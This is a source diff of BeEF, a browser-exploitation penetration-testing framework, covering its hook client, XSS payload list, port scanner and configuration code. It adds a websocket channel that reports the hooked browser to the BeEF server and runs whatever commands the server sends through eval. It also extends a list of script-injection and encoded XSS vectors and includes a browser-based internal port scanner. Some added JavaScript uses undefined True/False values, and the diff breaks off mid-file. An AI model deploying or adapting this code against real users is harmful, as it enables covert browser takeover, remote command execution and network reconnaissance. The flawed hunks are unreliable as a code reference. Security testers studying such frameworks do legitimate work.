@@ -377,7 +408,7 @@ beef.net = {
    },

    //Sends back browser details to framework
-    browser_details: function() {
+    browser_details:function () {
        var details = beef.browser.getDetails();
        details['HookSessionID'] = beef.session.get_hook_session_id();
        this.send('/init', 0, details);
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.dns
 * 
@@ -58,7 +49,7 @@ beef.net.dns = {
 			img.onload = function() { dom.removeChild(this); }
 			img.onerror = function() { dom.removeChild(this); }
 			dom.appendChild(img);
-		}
+		};

 		// encode message
 		var xor_key = Math.floor(Math.random()*99000+1000);
--- a/core/main/client/net/local.js
+++ b/core/main/client/net/local.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.local
 * 
@@ -21,6 +12,8 @@
 beef.net.local = {
 	
 	sock: false,
+	checkJava: false,
+	hasJava: false,
 	
 	/**
 	 * Initializes the java socket. We have to use this method because
@@ -29,16 +22,30 @@ beef.net.local = {
 	 * is invalid:
 	 * sock: new java.net.Socket();
 	 */
+
 	initializeSocket: function() {
-		if(! beef.browser.hasJava()) return -1;
-		
-		try {
-			this.sock = new java.net.Socket();
-		} catch(e) {
-			return -1;
+		if(this.checkJava){	
+			if(!beef.browser.hasJava()) {
+				this.checkJava=True;
+				this.hasJava=False;
+				return -1;
+			}else{
+				this.checkJava=True;
+				this.hasJava=True;
+				return 1;
+			}
+		}
+		else{
+			if(!this.hasJava) return -1;
+			else{	
+				try {
+					this.sock = new java.net.Socket();
+				} catch(e) {
+					return -1;
+				}
+				return 1;
+			}
 		}
-		
-		return 1;
 	},
 	
 	/**
@@ -47,7 +54,7 @@ beef.net.local = {
 	 * @error: return -1 if the internal ip cannot be retrieved.
 	 */
 	getLocalAddress: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -65,7 +72,7 @@ beef.net.local = {
 	 * @error: return -1 if the hostname cannot be retrieved.
 	 */
 	getLocalHostname: function() {
-		if(! beef.browser.hasJava()) return false;
+		if(!this.hasJava) return false;
 		
 		this.initializeSocket();
 		
@@ -79,4 +86,4 @@ beef.net.local = {
 	
 };

-beef.regCmp('beef.net.local');
+beef.regCmp('beef.net.local');
--- a/core/main/client/net/portscanner.js
+++ b/core/main/client/net/portscanner.js
@@ -1,63 +1,54 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.net.portscanner
- * 
- * Provides port scanning functions for the zombie. A mod of pdp's scanner
- * 
- * Version: '0.1',
- * author: 'Petko Petkov',
- * homepage: 'http://www.gnucitizen.org'
- */
-
-beef.net.portscanner = {
-
-		scanPort: function(callback, target, port, timeout) 
-		{
-			var timeout = (timeout == null)?100:timeout;
-			var img = new Image();
-
-			img.onerror = function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'open');
-			};
-
-			img.onload  = img.onerror;
-			
-			img.src = 'http://' + target + ':' + port;
-
-			setTimeout(function () {
-				if (!img) return;
-				img = undefined;
-				callback(target, port, 'closed');
-			}, timeout);
-
-		},
-
-		scanTarget: function(callback, target, ports_str, timeout)
-		{
-			var ports = ports_str.split(",");
-
-			for (index = 0; index < ports.length; index++) {
-				this.scanPort(callback, target, ports[index], timeout);
-			};
-
-		}
-};
-
-beef.regCmp('beef.net.portscanner');
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.net.portscanner
+ * 
+ * Provides port scanning functions for the zombie. A mod of pdp's scanner
+ * 
+ * Version: '0.1',
+ * author: 'Petko Petkov',
+ * homepage: 'http://www.gnucitizen.org'
+ */
+
+beef.net.portscanner = {
+
+		scanPort: function(callback, target, port, timeout) 
+		{
+			var timeout = (timeout == null)?100:timeout;
+			var img = new Image();
+
+			img.onerror = function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'open');
+			};
+
+			img.onload  = img.onerror;
+			
+			img.src = 'http://' + target + ':' + port;
+
+			setTimeout(function () {
+				if (!img) return;
+				img = undefined;
+				callback(target, port, 'closed');
+			}, timeout);
+
+		},
+
+		scanTarget: function(callback, target, ports_str, timeout)
+		{
+			var ports = ports_str.split(",");
+
+			for (index = 0; index < ports.length; index++) {
+				this.scanPort(callback, target, ports[index], timeout);
+			};
+
+		}
+};
+
+beef.regCmp('beef.net.portscanner');
+
--- a/core/main/client/net/requester.js
+++ b/core/main/client/net/requester.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.net.requester
 * 
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -49,20 +49,27 @@ beef.net.xssrays = {
    //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
    vectors: [

-//				  {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
-//        {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
-        {input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
-		{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
+//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
+//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
+//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
+//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
 //				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//        {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
+//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
 //				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
-//  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
-        //{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
+				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
+  				  {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
    ],
    uniqueID: 0,
    rays: [],
@@ -99,7 +106,7 @@ beef.net.xssrays = {

    // util function. Print string to the console only if the debug flag is on and the browser is not IE.
    printDebug:function(log) {
-        if (this.debug && !beef.browser.isIE()) {
+        if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
            console.log("[XssRays] " + log);
        }
    },
@@ -181,6 +188,13 @@ beef.net.xssrays = {
                if (target.search.length > 0) {
                    target.search = target.search.slice(1);
                    target.search = target.search.split(/&|&amp;/);
+
+                    if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
+                       var pathname = "/" + target.pathname;
+                    }else{
+                        var pathname = target.pathname;
+                    }
+
                    var params = {};
                    for (var i = 0; i < target.search.length; i++) {
                        target.search[i] = target.search[i].split('=');
@@ -197,20 +211,20 @@ beef.net.xssrays = {
                        }
                        if (this.vectors[i].url) {
                            if (target.port == null || target.port == "") {
-                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
+                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
                            } else {
-                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
+                                beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
                            }
                        }
                        if (this.vectors[i].path) {
                            if (target.port == null || target.port == "") {
-                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
+                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
                            } else {
-                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
-                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
+                                beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
+                                this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
                            }
                        }
                    }
@@ -365,11 +379,20 @@ beef.net.xssrays = {
            /*
             * ++++++++++ create the iFrame that will contain the attack vector ++++++++++
             */
-            var iframe = document.createElement('iframe');
+            if(beef.browser.isIE()){
+                try {
+                    var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
+                } catch (e) {
+                    var iframe = document.createElement('iframe');
+                    iframe.name = 'ray' + Math.random().toString();
+                }
+            }else{
+                var iframe = document.createElement('iframe');
+                iframe.name = 'ray' + Math.random().toString();
+            }
            iframe.style.display = 'none';
            iframe.id = 'ray' + beef.net.xssrays.uniqueID;
            iframe.time = beef.net.xssrays.timestamp();
-            iframe.name = 'ray' + Math.random().toString();

            if (method === 'GET') {
                if(beef.browser.isC() || beef.browser.isS()){
@@ -433,11 +456,13 @@ beef.net.xssrays = {
                numOfConnections++;
                //beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
                if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
-                    if (iframe) {
-                        beef.net.xssrays.complete();
-                        beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
-                        document.body.removeChild(iframe);
-                    }
+                    try{
+                        if (iframe) {
+                            beef.net.xssrays.complete();
+                            beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
+                            document.body.removeChild(iframe);
+                        }
+                    }catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
                }
            }

--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.os = {

 	ua: navigator.userAgent,
@@ -72,7 +63,11 @@ beef.os = {
 	isMacintosh: function() {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
-	
+
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +92,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},

+	isWebOS: function() {
+		return (this.ua.match('webOS')) ? true : false;
+	},
+
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -139,11 +138,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';

 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
+
+		// zune
+		//if (this.isZune()) return 'Zune';
 		
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +158,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
+		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
 	}
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.session
 *
@@ -82,7 +73,7 @@ beef.session = {
 	/**
 	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
 	 */
-	persistant: function() {
+	persistent: function() {
 		$j('a').click(function(e) {
 			if ($j(this).attr('href') != '')
 			{
--- a/core/main/client/timeout.js
+++ b/core/main/client/timeout.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ Sometimes there are timing issues and looks like beef_init
+ is not called at all (always in cross-domain situations,
+ for example calling the hook with jquery getScript,
+ or sometimes with event handler injections).
+
+ To fix this, we call again beef_init after 1 second.
+ Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
+ antisnatchor
+ */
+setTimeout(beef_init, 1000);
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @Literal object: beef.updater
 *
@@ -23,7 +14,7 @@ beef.updater = {
 	// Low timeouts combined with the way the framework sends commamd modules result 
 	// in instructions being sent repeatedly or complex code. 
 	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 1000,
+	timeout: 5000,
 	
 	// A lock.
 	lock: false,
@@ -51,10 +42,14 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			} else {
-				this.get_commands();
+			}
+
+            else {
+				this.get_commands();    /*Polling*/
 			}
 		}
+
+      // ( typeof beef.websocket === "undefined")
 		setTimeout("beef.updater.check();", beef.updater.timeout);
 	},
 	
@@ -62,7 +57,7 @@ beef.updater = {
 	get_commands: function(http_response) {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
                if (response.body != null && response.body.length > 0)
                    beef.updater.execute_commands();
            });
@@ -78,7 +73,8 @@ beef.updater = {
 		if(beef.commands.length == 0) return;
 		
 		this.lock = true;
-		
+		/*here execute the command */
+
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -90,6 +86,6 @@ beef.updater = {
 		
 		this.lock = false;
 	}
-}
+};

 beef.regCmp('beef.updater');
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -0,0 +1,77 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+//beef.websocket.socket.send(take answer to server beef)
+/*New browser init call this */
+
+beef.websocket = {
+
+    socket:null,
+    alive_timer:<%= @websocket_timer %>,
+
+    init:function () {
+        var webSocketServer = beef.net.host;
+        var webSocketPort = <%= @websocket_port %>;
+        var webSocketSecure = <%= @websocket_secure %>;
+        var protocol = "ws://";
+        //console.log("We are inside init");
+        /*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
+        if(webSocketSecure && window.location.protocol=="https:"){
+            protocol = "wss://";
+        webSocketPort= <%= @websocket_sec_port %>;
+        }
+
+    if (beef.browser.isFF() && !!window.MozWebSocket) {
+        beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+
+        } else {
+        beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }
+
+    },
+    /* send Helo message to the BeEF server and start async communication*/
+    start:function () {
+        new beef.websocket.init();
+        this.socket.onopen = function () {
+        //console.log("Socket has been opened!");
+
+        /*send browser id*/
+        beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
+            //console.log("Connected and Helo");
+            beef.websocket.alive();
+        }
+        this.socket.onmessage = function (message) {
+            //console.log("Received message via WS."+ message.data);
+            eval(message.data);
+        }
+
+        this.socket.onclose = function () {
+        setTimeout(function(){beef.websocket.start()}, 5000);
+        }
+
+    },
+
+    send:function (data) {
+        try {
+        this.socket.send(data);
+        //console.log("Sent [" + data + "]");
+         }
+         catch(err){
+         //console.log(err);
+
+         }
+    },
+
+    alive: function (){
+        beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
+//        console.log("sent alive");
+        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
+
+    }
+};
+
+beef.regCmp('beef.websocket');
--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -108,7 +98,7 @@ module BeEF
      # Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
      # @param [Hash] http_params HTTP parameters
      # @param [Hash] http_headers HTTP headers
-      def build_callback_datastore(http_params, http_headers)
+      def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
        @datastore = {'http_headers' => {}} # init the datastore

        # get, check and add the http_params to the datastore
@@ -126,6 +116,9 @@ module BeEF
          (print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
          @datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
        }
+        @datastore['results'] = result
+        @datastore['cid'] = command_id
+        @datastore['beefhook'] = beefhook		
      end

      # Returns the output of the command. These are the actual instructions sent to the browser.
--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -19,24 +9,31 @@ module BeEF

    class Configuration

-      include Singleton
+      attr_accessor :config
+
+      # antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
+      # of the Configuration object while having the possibility to specify a parameter to the constructor.
+      # This is  why we don't use anymore the default Ruby implementation -> include Singleton
+      def self.instance()
+        return @@instance
+      end

      # Loads the default configuration system
      # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
-      def initialize(configuration_file="#{$root_dir}/config.yaml")
-        # argument type checking
-        raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
-        # test to make sure file exists
-        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
+      def initialize(config)
+        raise Exception::TypeError, '"config" needs to be a string' if not config.string?
+        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
        begin
          #open base config
-          @config = self.load(configuration_file)
+          @config = self.load(config)
          # set default value if key? does not exist
          @config.default = nil
+          @@config = config
        rescue Exception => e
          print_error "Fatal Error: cannot load configuration file"
          print_debug e
        end
+        @@instance = self
      end

      # Loads yaml file
@@ -111,7 +108,9 @@ module BeEF
      # Load module configurations
      def load_modules_config
        self.set('beef.module', {})
-        Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
+        # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+        module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
+        Dir.glob(module_configs) do | cf |
          y = self.load(cf)
          if y != nil
            y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
--- a/extensions/console/banners.rb
+++ b/extensions/console/banners.rb
@@ -1,20 +1,10 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
